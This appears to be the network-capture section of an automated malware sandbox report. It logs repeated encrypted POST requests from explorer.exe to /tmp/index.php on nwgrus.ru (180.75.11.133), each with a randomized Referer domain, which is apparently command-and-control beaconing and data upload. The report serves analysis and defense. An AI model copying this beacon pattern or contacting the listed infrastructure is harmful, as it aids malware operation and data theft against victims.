    Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 76 03 d4 ed
    Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vuvK(^|AO-BD]ru6G)KW@>5Ak1
Oct 8, 2024 03:14:24.986113071 CEST  484                IN
    HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Tue, 08 Oct 2024 01:14:24 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.4  49739        180.75.11.133   80                2580  C:\Windows\explorer.exe

Timestamp                            Bytes transferred  Direction  Data (on the indented lines that follow)
Oct 8, 2024 03:14:24.993828058 CEST  280                OUT
    POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://hkuvmvjfakdhd.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 153
    Host: nwgrus.ru
Oct 8, 2024 03:14:24.993864059 CEST  153                OUT
    Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 3c 1e c9 a5
    Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vu<i(SPIhII'n:wV(8^VCrVM)
Oct 8, 2024 03:14:26.372226954 CEST  137                IN
    HTTP/1.1 200 OK
    Server: nginx/1.26.0
    Date: Tue, 08 Oct 2024 01:14:26 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49740 | 180.75.11.133 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:14:26.381064892 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gspricnhwajrk.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 116
Host: nwgrus.ru
Oct 8, 2024 03:14:26.381099939 CEST | 116 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 73 4f d8 91
Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vusOc#nuIyhryI
Oct 8, 2024 03:14:27.804676056 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 01:14:27 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49741 | 180.75.11.133 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:14:27.813083887 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ihkjhoeohsucndfk.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 341
Host: nwgrus.ru
Oct 8, 2024 03:14:27.813113928 CEST | 341 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 66 35 ce 84
Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vuf5XC{EkZ||<8h1@jJGc"F] UPA%}H7%cnsbS(E-]\""7edxzyNNooN$D
Oct 8, 2024 03:14:29.188271999 CEST | 137 | IN | HTTP/1.1 200 OK
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 01:14:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49742 | 180.75.11.133 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:14:29.195943117 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://lpitxyhvwvj.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 356
Host: nwgrus.ru
Oct 8, 2024 03:14:29.195971012 CEST | 356 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 64 42 a2 aa
Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vudB<w@:PS):(o@tx.[V@.ESaCfZb(<9AA4<>:I/^,[tvc#knFr:RF
Oct 8, 2024 03:14:30.566800117 CEST | 137 | IN | HTTP/1.1 200 OK
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 01:14:30 GMT
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49743 | 180.75.11.133 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:14:30.575489044 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://yltrrjxrgdt.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 293
Host: nwgrus.ru
Oct 8, 2024 03:14:30.575522900 CEST | 293 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 32 09 df b6
Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vu2\?zt_uKTS.^"z=?:5F0W&EmI\l2l6G2N>)(]e8]1>_/an4xTbJP'
Oct 8, 2024 03:14:31.966928005 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 01:14:31 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49744 | 180.75.11.133 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:14:31.976115942 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jypectwcaivky.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 147
Host: nwgrus.ru
Oct 8, 2024 03:14:31.976259947 CEST | 147 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 56 05 db f8
Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vuVYAcj8^w2Wo$$w,%8:4>5I
Oct 8, 2024 03:14:33.349793911 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 01:14:33 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49745 | 180.75.11.133 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:14:33.357906103 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://uvanlbvtcqkc.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 270
Host: nwgrus.ru
Oct 8, 2024 03:14:33.357943058 CEST | 270 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 7f 4e e9 8d
Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vuNDRU[ET#f8d9B:jMg'(OG1_m~t<&t}`3a0W:e+V8ELLHJWfj&S1
Oct 8, 2024 03:14:34.724086046 CEST | 137 | IN | HTTP/1.1 200 OK
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 01:14:34 GMT
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49746 | 180.75.11.133 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:14:34.731926918 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jkgktqvsjdwb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 300
Host: nwgrus.ru
Oct 8, 2024 03:14:34.731926918 CEST | 300 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 4c 34 e0 fe
Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vuL4VIznLjCI?6@E6v7)B[C91GMQ:5"gn1K$q4YzXgQCW*6PUDV4taB|k5L#2
Oct 8, 2024 03:14:36.128566027 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 01:14:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      11192.168.2.449747180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:36.136688948 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://cxrauupqkavo.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 157
                                                                                                                                      Host: nwgrus.ru
Oct 8, 2024 03:14:36.136688948 CEST | 157 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 3f 35 e5 fc
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vu?5sXOa#.N>?j;'fJ_@BHQb4XMvE1X
Oct 8, 2024 03:14:37.511106014 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:37 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49748 | 180.75.11.133 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:14:37.519217014 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://fmrccqvtujxqbxpg.com/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 296
                                                                                                                                      Host: nwgrus.ru
Oct 8, 2024 03:14:37.519237995 CEST | 296 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 65 09 ad f0
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vuefNqy`8,QHUa|VjV!0JEAL_4Mjpl)*IWp{9`a(shZOfl@F(MS
Oct 8, 2024 03:14:38.888278961 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:38 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49749 | 180.75.11.133 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:14:38.896028042 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://keeemaaxcllp.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 171
                                                                                                                                      Host: nwgrus.ru
Oct 8, 2024 03:14:38.896028042 CEST | 171 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 74 2d aa a3
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vut-EmquRX4=ndoogN.^]CZ|55bjS4j
Oct 8, 2024 03:14:40.294745922 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:40 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
